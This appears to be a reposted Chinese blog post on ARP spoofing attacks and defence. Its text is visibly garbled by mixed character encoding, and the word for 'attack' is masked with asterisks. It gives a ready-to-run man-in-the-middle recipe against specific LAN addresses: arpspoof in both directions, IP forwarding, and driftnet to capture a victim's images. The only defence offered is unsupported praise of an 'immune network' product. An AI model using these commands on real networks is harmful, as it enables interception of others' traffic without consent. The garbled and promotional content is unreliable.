?ARP（Address Resolution Protocol，地址解析協(xié)議）是一個(gè)位于TCP/IP協(xié)議棧中的網(wǎng)絡(luò)層，負(fù)責(zé)將某個(gè)IP地址解析成對應(yīng)的MAC地址。

?????????ARP協(xié)議的基本功能就是通過目標(biāo)設(shè)備的IP地址，查詢目標(biāo)設(shè)備的MAC地址，以保證通信的進(jìn)行。

???ARP***的局限性

???ARP***僅能在以太網(wǎng)（局域網(wǎng)如：機(jī)房、內(nèi)網(wǎng)、公司網(wǎng)絡(luò)等）進(jìn)行無法對外網(wǎng)（互聯(lián)網(wǎng)、非本區(qū)域內(nèi)的局域網(wǎng)）進(jìn)行***。

??????????ARP***就是通過偽造IP地址和MAC地址實(shí)現(xiàn)ARP欺騙，能夠在網(wǎng)絡(luò)中產(chǎn)生大量的ARP通信量使網(wǎng)絡(luò)阻塞，***者只要持續(xù)不斷的發(fā)出偽造的ARP響應(yīng)包就能更改目標(biāo)主機(jī)ARP緩存中的IP-MAC條目，造成網(wǎng)絡(luò)中斷或中間人***。

?arpspoof -i eth0 -t 172.28.15.4 172.28.15.254

?echo 1 > /proc/sys/net/ipv4/ip_forward

?driftnet

?arpspoof -i eth0 -t 172.28.15.254 172.28.15.4

根據(jù)網(wǎng)上查詢，免疫網(wǎng)絡(luò)具有強(qiáng)大的網(wǎng)絡(luò)基礎(chǔ)安全和管理功能，免疫網(wǎng)絡(luò)確實(shí)真正解決了困擾已久的ARP問題，技術(shù)上是嚴(yán)謹(jǐn)?shù)?#xff0c;應(yīng)用上是可行的，成本也是相對低廉。

轉(zhuǎn)載于:https://blog.51cto.com/12064625/1885002

與50位技術(shù)專家面對面20年技術(shù)見證，附贈技術(shù)全景圖

總結(jié)

以上是生活随笔為你收集整理的arp的***和防御的全部內(nèi)容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網(wǎng)站內(nèi)容還不錯，歡迎將生活随笔推薦給好友。